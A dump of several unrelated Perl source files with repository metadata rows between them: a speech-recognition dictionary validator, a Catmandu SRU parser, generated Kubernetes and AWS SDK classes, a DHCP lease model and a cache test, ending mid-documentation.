sub check_lexicon {
my ($lexfn, $pron_probs) = @_;
print "Checking $lexfn\n";
  my %seen_line = ();
if(-z "$lexfn") {set_to_fail(); print "--> ERROR: $lexfn is empty or does not exist\n";}
if(!open(L, "<$lexfn")) {set_to_fail(); print "--> ERROR: fail to open $lexfn\n";}
$idx = 1;
$success = 1;
print "--> reading $lexfn\n";
while (<L>) {
if (defined $seen_line{$_}) {
print "--> ERROR: line '$_' of $lexfn is repeated\n";
set_to_fail();
}
$seen_line{$_} = 1;
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $lexfn does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
$word = shift @row;
if (!defined $word) {
set_to_fail(); print "--> ERROR: empty lexicon line in $lexfn\n";
}
if ($pron_probs) {
$prob = shift @row;
if (!($prob > 0.0 && $prob <= 1.0)) {
set_to_fail(); print "--> ERROR: bad pron-prob in lexicon-line '$_', in $lexfn\n";
}
}
foreach (0 .. @row-1) {
if (!$silence{@row[$_]} and !$nonsilence{@row[$_]}) {
set_to_fail(); print "--> ERROR: phone \"@row[$_]\" is not in {, non}silence.txt (line $idx)\n";
}
}
$idx ++;
}
  %seen_line = ();
close(L);
$success == 0 || print "--> $lexfn is OK\n";
print "\n";
}
if (-f "$dict/lexicon.txt") { check_lexicon("$dict/lexicon.txt", 0); }
if (-f "$dict/lexiconp.txt") { check_lexicon("$dict/lexiconp.txt", 1); }
if (!(-f "$dict/lexicon.txt" || -f "$dict/lexiconp.txt")) {
print "--> ERROR: neither lexicon.txt or lexiconp.txt exist in directory $dir\n";
set_to_fail();
}
# If both lexicon.txt and lexiconp.txt exist, we check that they correspond to
# each other. If not, it could be that the user overwrote one and we need to
# regenerate the other, but we don't know which is which.
if ( (-f "$dict/lexicon.txt") && (-f "$dict/lexiconp.txt")) {
print "Checking that lexicon.txt and lexiconp.txt match\n";
if (!open(L, "<$dict/lexicon.txt") || !open(P, "<$dict/lexiconp.txt")) {
die "Error opening lexicon.txt and/or lexiconp.txt"; # already checked, so would be code error.
}
my $line_num = 0;
while(<L>) {
$line_num++;
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/lexicon.txt does not end in newline.\n";
set_to_fail();
last;
}
@A = split;
$x = <P>;
if ($x !~ s/\n$//) {
print "--> ERROR: last line '$x' of $dict/lexiconp.txt does not end in newline.\n";
set_to_fail();
last;
}
if (!defined $x) {
print "--> ERROR: lexicon.txt and lexiconp.txt have different numbers of lines (mismatch); delete one.\n";
set_to_fail();
last;
}
@B = split(" ", $x);
$w = shift @B;
if ($w eq "<s>" || $w eq "</s>") {
print "--> ERROR: lexicon.txt contains forbidden word $w\n";
set_to_fail();
}
if (@B == 0) {
print "--> ERROR: lexicon.txt contains word $w with empty pronunciation.\n";
set_to_fail();
last;
}
$p = shift @B;
unshift @B, $w;
# now @A and @B should be the same.
if ($#A != $#B) {
print "--> ERROR: lexicon.txt and lexiconp.txt have mismatched lines '$_' versus '$x'; delete one (line $line_num).\n";
set_to_fail();
last;
}
for ($n = 0; $n < @A; $n++) {
if ($A[$n] ne $B[$n]) {
print "--> ERROR: lexicon.txt and lexiconp.txt have mismatched lines '$_' versus '$x'; delete one (line $line_num)\n";
set_to_fail();
last;
}
}
}
$x = <P>;
if (defined $x && $exit == 0) {
print "--> ERROR: lexicon.txt and lexiconp.txt have different numbers of lines (mismatch); delete one.\n";
set_to_fail();
}
}
# Checking extra_questions.txt -------------------------------
%distinguished = (); # Keep track of all phone-pairs including nonsilence that
# are distinguished (split apart) by extra_questions.txt,
# as $distinguished{$p1,$p2} = 1. This will be used to
# make sure that we don't have pairs of phones on the same
# line in nonsilence_phones.txt that can never be
# distinguished from each other by questions. (If any two
# phones appear on the same line in nonsilence_phones.txt,
# they share a tree root, and since the automatic
# question-building treats all phones that appear on the
# same line of nonsilence_phones.txt as being in the same
# group, we can never distinguish them without resorting to
                     # questions in extra_questions.txt.)
print "Checking $dict/extra_questions.txt ...\n";
if (-s "$dict/extra_questions.txt") {
if (!open(EX, "<$dict/extra_questions.txt")) {
set_to_fail(); print "--> ERROR: fail to open $dict/extra_questions.txt\n";
}
$idx = 1;
$success = 1;
print "--> reading $dict/extra_questions.txt\n";
while(<EX>) {
if (! s/\n$//) {
print "--> ERROR: last line '$_' of $dict/extra_questions.txt does not end in newline.\n";
set_to_fail();
}
my @row = split(" ", $_);
if (@row == 0) {
set_to_fail(); print "--> ERROR: empty line in $dict/extra_questions.txt\n";
}
foreach (0 .. @row-1) {
if(!$silence{@row[$_]} and !$nonsilence{@row[$_]}) {
set_to_fail(); print "--> ERROR: phone \"@row[$_]\" is not in {, non}silence.txt (line $idx, block ", $_+1, ")\n";
}
$idx ++;
}
%row_hash = ();
foreach $p (@row) { $row_hash{$p} = 1; }
foreach $p1 (@row) {
# Update %distinguished hash.
foreach $p2 (keys %nonsilence) {
if (!defined $row_hash{$p2}) { # for each p1 in this question and p2 not
# in this question (and in nonsilence
# phones)... mark p1,p2 as being split apart
$distinguished{$p1,$p2} = 1;
$distinguished{$p2,$p1} = 1;
}
}
}
}
close(EX);
$success == 0 || print "--> $dict/extra_questions.txt is OK\n";
} else { print "--> $dict/extra_questions.txt is empty (this is OK)\n";}
# check nonsilence_phones.txt again for phone-pairs that are never
# distnguishable. (note: this situation is normal and expected for silence
# phones, so we don't check it.)
if(!open(NS, "<$dict/nonsilence_phones.txt")) {
print "--> ERROR: fail to open $dict/nonsilence_phones.txt the second time\n"; exit 1;
}
$num_warn_nosplit = 0;
$num_warn_nosplit_limit = 10;
while(<NS>) {
my @row = split(" ", $_);
foreach $p1 (@row) {
foreach $p2 (@row) {
if ($p1 ne $p2 && ! $distinguished{$p1,$p2}) {
set_to_fail();
if ($num_warn_nosplit <= $num_warn_nosplit_limit) {
print "--> ERROR: phones $p1 and $p2 share a tree root but can never be distinguished by extra_questions.txt.\n";
}
if ($num_warn_nosplit == $num_warn_nosplit_limit) {
print "... Not warning any more times about this issue.\n";
}
if ($num_warn_nosplit == 0) {
print " (note: we started checking for this only recently. You can still build a system but\n";
print " phones $p1 and $p2 will be acoustically indistinguishable).\n";
}
$num_warn_nosplit++;
}
}
}
}
if ($exit == 1) { print "--> ERROR validating dictionary directory $dict (see detailed error messages above)\n"; exit 1;}
else { print "--> SUCCESS [validating dictionary directory $dict]\n"; }
exit 0;
| 35.173653 | 143 | 0.564692 |
ed915dd9dbaa87efc5b37cf280a74d4b127f6dd7 | 1,169 | pm | Perl | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | lib/Catmandu/Importer/SRU/Parser/ppxml.pm | jorol/Catmandu-PICA | 36cd67ca3486aa749d520bdccf90da99de0dcfb2 | [
"Artistic-1.0"
] | null | null | null | package Catmandu::Importer::SRU::Parser::ppxml;
our $VERSION = '1.00';
use Moo;
use PICA::Parser::PPXML;
sub parse {
my ( $self, $record ) = @_;
my $xml = $record->{recordData}->toString();
my $parser = PICA::Parser::PPXML->new( $xml );
return $parser->next;
}
1;
__END__
=head1 NAME
Catmandu::Importer::SRU::Parser::ppxml - Parse SRU response with PICA+ XML data (PPXML, a format variant of the Deutsche Nationalbibliothek) into Catmandu PICA
=head1 SYNOPSIS
my %attrs = (
base => 'http://services.dnb.de/sru/zdb',
query => 'zdbid = 24220127',
recordSchema => 'PicaPlus-xml' ,
parser => 'ppxml' ,
);
my $importer = Catmandu::Importer::SRU->new(%attrs);
To give an example of using the L<catmandu> command line client:
catmandu convert SRU --base http://services.dnb.de/sru/zdb
--query "zdbid = 24220127"
--recordSchema PicaPlus-xml
--parser ppxml
to PICA --type plain
=head1 DESCRIPTION
Each ppxml response will be transformed into the format defined by
L<Catmandu::Importer::PICA>
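As a sketch (the method shown comes from the generic Catmandu iterator
interface, not from anything specific to this parser), the parsed records
can be consumed like any other Catmandu importer:
    $importer->each( sub {
        my ($record) = @_;
        # $record is a PICA record structure as produced by Catmandu::Importer::PICA
    } );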
=cut
| 23.857143 | 159 | 0.606501 |
73e588d394154b58125aeda51b53cab5d9ef5695 | 5,636 | pm | Perl | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null | lib/Kubernetes/Object/ExtensionsV1beta1HostPortRange.pm | mrbobbytables/perl | 44a05ecf0c2f31056b08b2f736d386377030b04f | [
"Apache-2.0"
] | null | null | null |
=begin comment
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: v1.13.7
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
package Kubernetes::Object::ExtensionsV1beta1HostPortRange;
require 5.6.0;
use strict;
use warnings;
use utf8;
use JSON qw(decode_json);
use Data::Dumper;
use Module::Runtime qw(use_module);
use Log::Any qw($log);
use Date::Parse;
use DateTime;
use base ( "Class::Accessor", "Class::Data::Inheritable" );
#
#HostPortRange defines a range of host ports that will be enabled by a policy for pods to use. It requires both the start and end to be defined. Deprecated: use HostPortRange from policy API Group instead.
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech). Do not edit the class manually.
# REF: https://openapi-generator.tech
#
=begin comment
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: v1.13.7
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
# Do not edit the class manually.
# Ref: https://openapi-generator.tech
#
__PACKAGE__->mk_classdata( 'attribute_map' => {} );
__PACKAGE__->mk_classdata( 'openapi_types' => {} );
__PACKAGE__->mk_classdata( 'method_documentation' => {} );
__PACKAGE__->mk_classdata( 'class_documentation' => {} );
# new plain object
sub new {
my ( $class, %args ) = @_;
my $self = bless {}, $class;
$self->init(%args);
return $self;
}
# initialize the object
sub init {
my ( $self, %args ) = @_;
foreach my $attribute ( keys %{ $self->attribute_map } ) {
my $args_key = $self->attribute_map->{$attribute};
$self->$attribute( $args{$args_key} );
}
}
# return perl hash
sub to_hash {
my $self = shift;
my $_hash = decode_json( JSON->new->convert_blessed->encode($self) );
return $_hash;
}
# used by JSON for serialization
sub TO_JSON {
my $self = shift;
my $_data = {};
foreach my $_key ( keys %{ $self->attribute_map } ) {
if ( defined $self->{$_key} ) {
$_data->{ $self->attribute_map->{$_key} } = $self->{$_key};
}
}
return $_data;
}
# from Perl hashref
sub from_hash {
my ( $self, $hash ) = @_;
# loop through attributes and use openapi_types to deserialize the data
while ( my ( $_key, $_type ) = each %{ $self->openapi_types } ) {
my $_json_attribute = $self->attribute_map->{$_key};
if ( $_type =~ /^array\[(.+)\]$/i ) { # array
my $_subclass = $1;
my @_array = ();
foreach my $_element ( @{ $hash->{$_json_attribute} } ) {
push @_array, $self->_deserialize( $_subclass, $_element );
}
$self->{$_key} = \@_array;
}
elsif ( $_type =~ /^hash\[string,(.+)\]$/i ) { # hash
my $_subclass = $1;
my %_hash = ();
while ( my ( $_key, $_element ) =
each %{ $hash->{$_json_attribute} } )
{
$_hash{$_key} = $self->_deserialize( $_subclass, $_element );
}
$self->{$_key} = \%_hash;
}
elsif ( exists $hash->{$_json_attribute} )
{ #hash(model), primitive, datetime
$self->{$_key} =
$self->_deserialize( $_type, $hash->{$_json_attribute} );
}
else {
$log->debugf( "Warning: %s (%s) does not exist in input hash\n",
$_key, $_json_attribute );
}
}
return $self;
}
# deserialize non-array data
sub _deserialize {
my ( $self, $type, $data ) = @_;
$log->debugf( "deserializing %s with %s", Dumper($data), $type );
if ( $type eq 'DateTime' ) {
return DateTime->from_epoch( epoch => str2time($data) );
}
elsif ( grep( /^$type$/, ( 'int', 'double', 'string', 'boolean' ) ) ) {
return $data;
}
else { # hash(model)
my $_instance = eval "Kubernetes::Object::$type->new()";
return $_instance->from_hash($data);
}
}
__PACKAGE__->class_documentation(
{
description =>
'HostPortRange defines a range of host ports that will be enabled by a policy for pods to use. It requires both the start and end to be defined. Deprecated: use HostPortRange from policy API Group instead.',
class => 'ExtensionsV1beta1HostPortRange',
required => [], # TODO
}
);
__PACKAGE__->method_documentation(
{
'max' => {
datatype => 'int',
base_name => 'max',
description => 'max is the end of the range, inclusive.',
format => '',
read_only => '',
},
'min' => {
datatype => 'int',
base_name => 'min',
description => 'min is the start of the range, inclusive.',
format => '',
read_only => '',
},
}
);
__PACKAGE__->openapi_types(
{
'max' => 'int',
'min' => 'int'
}
);
__PACKAGE__->attribute_map(
{
'max' => 'max',
'min' => 'min'
}
);
__PACKAGE__->mk_accessors( keys %{ __PACKAGE__->attribute_map } );
1;
| 26.838095 | 208 | 0.575053 |
ed02b1c3a749de182088f75bb04f5ac632c26d83 | 1,333 | pm | Perl | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 3 | 2015-06-21T18:23:17.000Z | 2017-06-11T23:19:29.000Z | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 34 | 2015-06-20T07:27:30.000Z | 2022-01-17T10:28:28.000Z | lib/App/Manoc/DB/Result/DHCPLease.pm | gmambro/manoc | 1c25734028970b4fda548c9d4aa8cc47eb67bc6d | [
"Artistic-1.0"
] | 1 | 2019-11-18T08:15:03.000Z | 2019-11-18T08:15:03.000Z | package App::Manoc::DB::Result::DHCPLease;
#ABSTRACT: A model object for DHCP leases
use strict;
use warnings;
##VERSION
use parent 'App::Manoc::DB::Result';
__PACKAGE__->load_components(qw/+App::Manoc::DB::InflateColumn::IPv4/);
__PACKAGE__->table('dhcp_lease');
__PACKAGE__->add_columns(
'id' => {
data_type => 'int',
is_auto_increment => 1,
is_nullable => 0,
},
'macaddr' => {
data_type => 'varchar',
is_nullable => 0,
size => 17
},
'ipaddr' => {
data_type => 'varchar',
is_nullable => 0,
size => 15,
ipv4_address => 1,
},
'hostname' => {
data_type => 'varchar',
size => 255,
is_nullable => 0,
},
'start' => {
data_type => 'int',
is_nullable => 0,
},
'end' => {
data_type => 'int',
is_nullable => 0,
},
'status' => {
data_type => 'varchar',
size => 16,
},
'dhcp_server_id' => {
data_type => 'int',
is_foreign_key => 1,
is_nullable => 0,
},
);
__PACKAGE__->belongs_to(
dhcp_server => 'App::Manoc::DB::Result::DHCPServer',
{ 'foreign.id' => 'self.dhcp_server_id' },
);
__PACKAGE__->set_primary_key('id');
1;
| 19.042857 | 71 | 0.489122 |
ed41271155bfb1a25827350b21e2258f98c4f002 | 1,598 | t | Perl | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | t/basic.t | karenetheridge/Cache-Cascade | 49436cefdd1034afe4d61cdda5ad55218b9025a5 | [
"Artistic-1.0"
] | null | null | null | use strict;
use warnings;
use Test::More tests => 26;
use ok "Cache::Cascade";
{
package MemCache;
sub new { bless {}, shift }
sub get { $_[0]{$_[1]} }
sub set { $_[0]{$_[1]} = $_[2] }
sub remove { delete $_[0]{$_[1]} }
}
my @caches = map { MemCache->new } 1 .. 3;
my $cache = Cache::Cascade->new( caches => \@caches );
isa_ok( $cache, "Cache::Cascade" );
is( $cache->get("foo"), undef, "no key yet" );
$caches[-1]->set( foo => "bar" );
is( $caches[-1]->get("foo"), "bar", "last cache stored" );
is( $caches[0]->get("foo"), undef, "first cache unaffected" );
is( $cache->get("foo"), "bar", "value gotten from lowest" );
$caches[0]->set( foo => "gorch" );
is( $cache->get("foo"), "gorch", "value gotten from highest" );
is( $caches[-1]->get("foo"), "bar", "foo is still bar in lowest" );
$cache->set( foo => "moose" );
is( $_->get("foo"), "moose", "stored in child" ) for @caches;
$cache->set_deep(0);
$cache->set( foo => "elk" );
is( $caches[0]->get("foo"), "elk", "set in highest" );
is( $caches[1]->get("foo"), "moose", "but not in others" );
$cache->remove("foo");
is( $_->get("foo"), undef, "removed from child" ) for @caches;
$cache->float_hits(1);
$caches[-1]->set( foo => "camel" );
is( $caches[0]->get("foo"), undef, "value not yet floated" );
is( $cache->get("foo"), "camel", "get from bottom" );
is( $_->get("foo"), "camel", "value floated" ) for @caches;
$caches[-1]->set( bar => "" );
is( $caches[0]->get("bar"), undef, "value not yet floated" );
is( $cache->get("bar"), "", "get from bottom" );
is( $_->get("bar"), "", "value floated" ) for @caches;
| 22.828571 | 67 | 0.562578 |
73dc1c3511e5dc75f8d331444bcbffb4c93617d7 | 2,990 | pm | Perl | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/WAFRegional/ListSqlInjectionMatchSets.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::WAFRegional::ListSqlInjectionMatchSets;
use Moose;
has Limit => (is => 'ro', isa => 'Int');
has NextMarker => (is => 'ro', isa => 'Str');
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'ListSqlInjectionMatchSets');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::WAFRegional::ListSqlInjectionMatchSetsResponse');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::WAFRegional::ListSqlInjectionMatchSets - Arguments for method ListSqlInjectionMatchSets on L<Paws::WAFRegional>
=head1 DESCRIPTION
This class represents the parameters used for calling the method ListSqlInjectionMatchSets on the
L<AWS WAF Regional|Paws::WAFRegional> service. Use the attributes of this class
as arguments to method ListSqlInjectionMatchSets.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to ListSqlInjectionMatchSets.
=head1 SYNOPSIS
    my $waf_regional = Paws->service('WAFRegional');
# To list SQL injection match sets
# The following example returns an array of up to 100 SQL injection match sets.
my $ListSqlInjectionMatchSetsResponse =
      $waf_regional->ListSqlInjectionMatchSets( 'Limit' => 100 );
# Results:
my $SqlInjectionMatchSets =
$ListSqlInjectionMatchSetsResponse->SqlInjectionMatchSets;
# Returns a L<Paws::WAFRegional::ListSqlInjectionMatchSetsResponse> object.
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/waf-regional/ListSqlInjectionMatchSets>
=head1 ATTRIBUTES
=head2 Limit => Int
Specifies the number of SqlInjectionMatchSet objects that you want AWS
WAF to return for this request. If you have more
C<SqlInjectionMatchSet> objects than the number you specify for
C<Limit>, the response includes a C<NextMarker> value that you can use
to get another batch of C<Rules>.
=head2 NextMarker => Str
If you specify a value for C<Limit> and you have more
SqlInjectionMatchSet objects than the value of C<Limit>, AWS WAF
returns a C<NextMarker> value in the response that allows you to list
another group of C<SqlInjectionMatchSets>. For the second and
subsequent C<ListSqlInjectionMatchSets> requests, specify the value of
C<NextMarker> from the previous response to get information about
another batch of C<SqlInjectionMatchSets>.
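As an illustration only (this loop is a sketch built from the attributes
described above, not part of the generated documentation), the marker is
typically fed back into the next call until the service stops returning
one:
    my @all_sets;
    my %args = ( Limit => 100 );
    while (1) {
        my $response = $waf_regional->ListSqlInjectionMatchSets(%args);
        push @all_sets, @{ $response->SqlInjectionMatchSets };
        last unless $response->NextMarker;
        $args{NextMarker} = $response->NextMarker;
    }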
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method ListSqlInjectionMatchSets in L<Paws::WAFRegional>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: L<https://github.com/pplu/aws-sdk-perl>
Please report bugs to: L<https://github.com/pplu/aws-sdk-perl/issues>
=cut
| 36.024096 | 249 | 0.762542 |
ed9c2627c5d8d8e51239afbe64b7b925d202b69e | 15,819 | pm | Perl | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 164 | 2015-01-08T14:58:53.000Z | 2022-02-20T19:16:24.000Z | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 348 | 2015-01-07T22:08:38.000Z | 2022-01-27T14:34:44.000Z | auto-lib/Paws/OpsWorks/CloneStack.pm | 0leksii/aws-sdk-perl | b2132fe3c79a06fd15b6137e8a0eb628de722e0f | [
"Apache-2.0"
] | 87 | 2015-04-22T06:29:47.000Z | 2021-09-29T14:45:55.000Z |
package Paws::OpsWorks::CloneStack;
use Moose;
has AgentVersion => (is => 'ro', isa => 'Str');
has Attributes => (is => 'ro', isa => 'Paws::OpsWorks::StackAttributes');
has ChefConfiguration => (is => 'ro', isa => 'Paws::OpsWorks::ChefConfiguration');
has CloneAppIds => (is => 'ro', isa => 'ArrayRef[Str|Undef]');
has ClonePermissions => (is => 'ro', isa => 'Bool');
has ConfigurationManager => (is => 'ro', isa => 'Paws::OpsWorks::StackConfigurationManager');
has CustomCookbooksSource => (is => 'ro', isa => 'Paws::OpsWorks::Source');
has CustomJson => (is => 'ro', isa => 'Str');
has DefaultAvailabilityZone => (is => 'ro', isa => 'Str');
has DefaultInstanceProfileArn => (is => 'ro', isa => 'Str');
has DefaultOs => (is => 'ro', isa => 'Str');
has DefaultRootDeviceType => (is => 'ro', isa => 'Str');
has DefaultSshKeyName => (is => 'ro', isa => 'Str');
has DefaultSubnetId => (is => 'ro', isa => 'Str');
has HostnameTheme => (is => 'ro', isa => 'Str');
has Name => (is => 'ro', isa => 'Str');
has Region => (is => 'ro', isa => 'Str');
has ServiceRoleArn => (is => 'ro', isa => 'Str', required => 1);
has SourceStackId => (is => 'ro', isa => 'Str', required => 1);
has UseCustomCookbooks => (is => 'ro', isa => 'Bool');
has UseOpsworksSecurityGroups => (is => 'ro', isa => 'Bool');
has VpcId => (is => 'ro', isa => 'Str');
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'CloneStack');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::OpsWorks::CloneStackResult');
class_has _result_key => (isa => 'Str', is => 'ro');
1;
### main pod documentation begin ###
=head1 NAME
Paws::OpsWorks::CloneStack - Arguments for method CloneStack on L<Paws::OpsWorks>
=head1 DESCRIPTION
This class represents the parameters used for calling the method CloneStack on the
L<AWS OpsWorks|Paws::OpsWorks> service. Use the attributes of this class
as arguments to method CloneStack.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to CloneStack.
=head1 SYNOPSIS
my $opsworks = Paws->service('OpsWorks');
my $CloneStackResult = $opsworks->CloneStack(
ServiceRoleArn => 'MyString',
SourceStackId => 'MyString',
AgentVersion => 'MyString', # OPTIONAL
Attributes => {
'Color' => 'MyString', # key: values: Color
}, # OPTIONAL
ChefConfiguration => {
BerkshelfVersion => 'MyString',
ManageBerkshelf => 1, # OPTIONAL
}, # OPTIONAL
CloneAppIds => [ 'MyString', ... ], # OPTIONAL
ClonePermissions => 1, # OPTIONAL
ConfigurationManager => {
Name => 'MyString',
Version => 'MyString',
}, # OPTIONAL
CustomCookbooksSource => {
Password => 'MyString',
Revision => 'MyString',
SshKey => 'MyString',
Type => 'git', # values: git, svn, archive, s3; OPTIONAL
Url => 'MyString',
Username => 'MyString',
}, # OPTIONAL
CustomJson => 'MyString', # OPTIONAL
DefaultAvailabilityZone => 'MyString', # OPTIONAL
DefaultInstanceProfileArn => 'MyString', # OPTIONAL
DefaultOs => 'MyString', # OPTIONAL
DefaultRootDeviceType => 'ebs', # OPTIONAL
DefaultSshKeyName => 'MyString', # OPTIONAL
DefaultSubnetId => 'MyString', # OPTIONAL
HostnameTheme => 'MyString', # OPTIONAL
Name => 'MyString', # OPTIONAL
Region => 'MyString', # OPTIONAL
UseCustomCookbooks => 1, # OPTIONAL
UseOpsworksSecurityGroups => 1, # OPTIONAL
VpcId => 'MyString', # OPTIONAL
);
# Results:
my $StackId = $CloneStackResult->StackId;
# Returns a L<Paws::OpsWorks::CloneStackResult> object.
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
For the AWS API documentation, see L<https://docs.aws.amazon.com/goto/WebAPI/opsworks/CloneStack>
=head1 ATTRIBUTES
=head2 AgentVersion => Str
The default AWS OpsWorks Stacks agent version. You have the following
options:
=over
=item *
Auto-update - Set this parameter to C<LATEST>. AWS OpsWorks Stacks
automatically installs new agent versions on the stack's instances as
soon as they are available.
=item *
Fixed version - Set this parameter to your preferred agent version. To
update the agent version, you must edit the stack configuration and
specify a new version. AWS OpsWorks Stacks then automatically installs
that version on the stack's instances.
=back
The default setting is C<LATEST>. To specify an agent version, you must
use the complete version number, not the abbreviated number shown on
the console. For a list of available agent version numbers, call
DescribeAgentVersions. AgentVersion cannot be set to Chef 12.2.
You can also specify an agent version when you create or update an
instance, which overrides the stack's default setting.
=head2 Attributes => L<Paws::OpsWorks::StackAttributes>
A list of stack attributes and values as key/value pairs to be added to
the cloned stack.
=head2 ChefConfiguration => L<Paws::OpsWorks::ChefConfiguration>
A C<ChefConfiguration> object that specifies whether to enable
Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more
information, see Create a New Stack
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-creating.html).
=head2 CloneAppIds => ArrayRef[Str|Undef]
A list of source stack app IDs to be included in the cloned stack.
=head2 ClonePermissions => Bool
Whether to clone the source stack's permissions.
=head2 ConfigurationManager => L<Paws::OpsWorks::StackConfigurationManager>
The configuration manager. When you clone a stack we recommend that you
use the configuration manager to specify the Chef version: 12, 11.10,
or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value
for Linux stacks is currently 12.
=head2 CustomCookbooksSource => L<Paws::OpsWorks::Source>
Contains the information required to retrieve an app or cookbook from a
repository. For more information, see Adding Apps
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingapps-creating.html)
or Cookbooks and Recipes
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingcookbook.html).
=head2 CustomJson => Str
A string that contains user-defined, custom JSON. It is used to
override the corresponding default stack configuration JSON values. The
string should be in the following format:
C<"{\"key1\": \"value1\", \"key2\": \"value2\",...}">
For more information about custom JSON, see Use Custom JSON to Modify
the Stack Configuration Attributes
(https://docs.aws.amazon.com/opsworks/latest/userguide/workingstacks-json.html)
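As an illustration only (not part of the generated documentation), the
string can be produced from a Perl hash with the core L<JSON::PP> encoder
and passed alongside the required parameters shown in the synopsis; the
C<key1>/C<key2> names are placeholders:
    use JSON::PP qw(encode_json);
    my $custom_json = encode_json( { key1 => 'value1', key2 => 'value2' } );
    $opsworks->CloneStack(
        ServiceRoleArn => 'MyString',
        SourceStackId  => 'MyString',
        CustomJson     => $custom_json,
    );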
=head2 DefaultAvailabilityZone => Str
The cloned stack's default Availability Zone, which must be in the
specified region. For more information, see Regions and Endpoints
(https://docs.aws.amazon.com/general/latest/gr/rande.html). If you also
specify a value for C<DefaultSubnetId>, the subnet must be in the same
zone. For more information, see the C<VpcId> parameter description.
=head2 DefaultInstanceProfileArn => Str
The Amazon Resource Name (ARN) of an IAM profile that is the default
profile for all of the stack's EC2 instances. For more information
about IAM ARNs, see Using Identifiers
(https://docs.aws.amazon.com/IAM/latest/UserGuide/Using_Identifiers.html).
=head2 DefaultOs => Str
The stack's operating system, which must be set to one of the
following.
=over
=item *
A supported Linux operating system: An Amazon Linux version, such as
C<Amazon Linux 2018.03>, C<Amazon Linux 2017.09>, C<Amazon Linux
2017.03>, C<Amazon Linux 2016.09>, C<Amazon Linux 2016.03>, C<Amazon
Linux 2015.09>, or C<Amazon Linux 2015.03>.
=item *
A supported Ubuntu operating system, such as C<Ubuntu 16.04 LTS>,
C<Ubuntu 14.04 LTS>, or C<Ubuntu 12.04 LTS>.
=item *
C<CentOS Linux 7>
=item *
C<Red Hat Enterprise Linux 7>
=item *
C<Microsoft Windows Server 2012 R2 Base>, C<Microsoft Windows Server
2012 R2 with SQL Server Express>, C<Microsoft Windows Server 2012 R2
with SQL Server Standard>, or C<Microsoft Windows Server 2012 R2 with
SQL Server Web>.
=item *
A custom AMI: C<Custom>. You specify the custom AMI you want to use
when you create instances. For more information about how to use custom
AMIs with OpsWorks, see Using Custom AMIs
